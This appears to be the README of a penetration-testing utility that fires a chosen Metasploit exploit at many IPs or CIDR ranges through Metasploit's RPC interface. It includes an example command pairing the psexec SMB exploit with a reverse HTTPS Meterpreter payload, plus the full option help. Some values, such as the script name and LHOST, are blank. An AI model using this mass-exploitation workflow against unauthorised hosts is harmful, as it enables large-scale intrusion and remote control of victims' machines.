helps running a given metasploit exploit against multiple targets.
It can be particularly useful during large scope engagements.
- msgpack-python
- requests
The script relies on Metasploit's RPC interface, before using it make sure you
have loaded the msgrpc
module from the console with the load msgrpc
Before running this script, you must also have started the payload handler as a
job from the console (with ExitOnSession
set to false
$ ./ -e windows/smb/psexec -p windows/meterpreter/reverse_https \
-t --opts='LHOST=,LPORT=443'
Target can be:
- a single IP
- a CIDR
- a comma-separated mix of both
Full help:
usage: [-h] -e EXPLOIT -p PAYLOAD -t TARGETS [--opts OPTIONS]
[--rpc-host HOST] [--rpc-port PORT] [--rpc-user USER]
[--rpc-passwd PASSWD] [--rpc-ssl]
Metasploit mass exploitation utility
optional arguments:
-h, --help show this help message and exit
-e EXPLOIT, --exploit EXPLOIT
exploit to run against targets
-p PAYLOAD, --payload PAYLOAD
payload to use with the exploit
-t TARGETS, --targets TARGETS
comma-separated list of IPs/CIDRs
--opts OPTIONS comma-separated options to pass to the exploit
MSFRPC connection:
--rpc-host HOST MSFRPC host (default:
--rpc-port PORT MSFRPC port (default: 55552)
--rpc-user USER user to use to connect to MSFRPC (default: msf)
--rpc-passwd PASSWD password to use to connect to MSFRPC (default: msf)
--rpc-ssl use SSL to connect to MSFRPC (default: False)